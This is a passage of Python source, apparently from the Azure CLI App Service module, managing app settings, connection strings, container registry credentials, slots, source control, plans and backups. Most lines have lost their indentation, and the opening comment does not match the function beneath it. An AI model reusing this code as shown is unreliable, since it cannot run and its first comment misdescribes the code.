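# returns True only when every 'should_have' key is present, every 'should_not_have' key is absent,
# and every 'should_contain' key has exactly the given value in the settings reported by Kudu.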
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
    result = [{'name': p,
               'value': result.properties[p].value,
               'type': result.properties[p].type,
               'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
try:
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
except StopIteration:
pass
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
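# Illustrative results of _format_fx_version (image names are hypothetical):
#   _format_fx_version('myregistry.azurecr.io/app:v1')        # -> 'DOCKER|myregistry.azurecr.io/app:v1'
#   _format_fx_version('<base64 compose file>', 'COMPOSE')    # -> 'COMPOSE|<base64 compose file>'
# A leading 'http://' or 'https://' is stripped from the image name before the prefix is applied.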
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if (web_app.reserved or not web_app.is_xenon) else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
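# Illustrative url_validator results: a value needs a scheme, a host and a path to count as a URL,
# e.g. url_validator('https://example.com/docker-compose.yml') is True, while a bare file name such
# as url_validator('docker-compose.yml') is False (hypothetical values).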
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any(linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
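# Illustrative behaviour of the helper above: for a linux_fx_version such as
# 'COMPOSE|<base64-encoded docker-compose.yml>' (hypothetical value), the part after '|' is
# base64-decoded and returned as bytes; any fx version that is not a multi-container type
# raises CLIError.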
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# For any modification to the non-optional parameters below, adjust the reflection logic in the
# method accordingly
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
vnet_route_all_enabled=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
    # note: getargvalues is already used in azure.cli.core.commands,
    # and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
setattr(configs, 'scm_ip_security_restrictions', None)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
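# Illustrative --generic-configurations inputs handled by update_site_configs above (values are
# hypothetical): a JSON object such as '{"minTlsVersion": "1.2"}' is parsed and each top-level key
# is applied to the site config, while a plain 'key=value' string is split on the first '='.
# Unless one of the supplied keys is 'ip_security_restrictions', the access-restriction fields are
# cleared from the payload so an update does not unintentionally overwrite existing restrictions.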
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
return result.properties
def _ssl_context():
    import platform
    if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
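# Illustrative output shape of _build_app_settings_output (hypothetical values):
#   [{'name': 'WEBSITE_NODE_DEFAULT_VERSION', 'value': '~16', 'slotSetting': False}, ...]
# Credential-related settings listed in APPSETTINGS_TO_MASK come back with a value of None.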
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
        if value[0] in ["'", '"']:  # strip away the quotes used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
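# Illustrative --settings/--slot-settings entry for update_connection_strings (hypothetical value):
#   "MyDb='Server=tcp:myserver.example.net;Database=mydb'"
# Each entry is split on the first '=' into a name and a value, and a value wrapped in single or
# double quotes has the surrounding quotes stripped before it is stored.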
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
        logger.warning('Both --multicontainer-config-file FILE and --multicontainer-config-type TYPE must be specified')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
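# Note on the ACR lookup in update_container_settings above: when the registry URL ends in
# '.azurecr.io' and no credentials are supplied, the registry name is taken from the first DNS
# label of the URL (a hypothetical 'https://myreg.azurecr.io' yields 'myreg') and admin credentials
# are fetched via _get_acr_cred; if that lookup fails, a warning is logged and the remaining
# settings are applied without credentials.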
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
    if not result or len(result) > 1:
        raise CLIError("Found no container registry, or more than one, with the name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
from azure.mgmt.web.models import HostNameBinding
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
host_name_binding=binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
slot=slot, host_name_binding=binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
    # the logic here is ported from the portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings, slot, client)
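# Sketch of what update_slot_configuration_from_source copies (per the code above): the general
# site configuration, app settings, and connection strings are read from production (or from the
# named source slot), and any names registered as slot settings are removed first so that sticky,
# slot-specific values are not propagated to the target slot.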
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, github_action=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
            # for non-server errors (anything other than 50x), raise immediately; otherwise retry up to 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
site_config = get_site_configs(cmd, resource_group_name, name, slot)
site_config.scm_type = 'LocalGit'
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False, zone_redundant=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
            raise ArgumentUsageError('Windows containers are not yet supported in an App Service Environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
raise ResourceNotFoundError(err_msg)
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
# TODO use zone_redundant field on ASP model when we switch to SDK version 5.0.0
if zone_redundant:
plan_def.enable_additional_properties_sending()
existing_properties = plan_def.serialize()["properties"]
plan_def.additional_properties["properties"] = existing_properties
plan_def.additional_properties["properties"]["zoneRedundant"] = True
if number_of_workers is None:
sku_def.capacity = 3
else:
sku_def.capacity = max(3, number_of_workers)
return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
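# Illustrative effect of --zone-redundant in create_app_service_plan above (a sketch; the SKU name
# is hypothetical and the exact payload depends on SDK serialization): because the SDK model in use
# has no zone_redundant field yet, the flag is injected through additional_properties, yielding a
# request body roughly like
#   {"sku": {"name": "P1v3", "capacity": 3}, "properties": {..., "zoneRedundant": true}}
# and the worker count is forced up to a minimum of 3.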
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def show_plan(cmd, resource_group_name, name):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
serverfarm_url_base = 'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
subscription_id = get_subscription_id(cmd.cli_ctx)
serverfarm_url = serverfarm_url_base.format(subscription_id, resource_group_name, name, client.DEFAULT_API_VERSION)
request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
response = send_raw_request(cmd.cli_ctx, "GET", request_url)
return response.json()
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
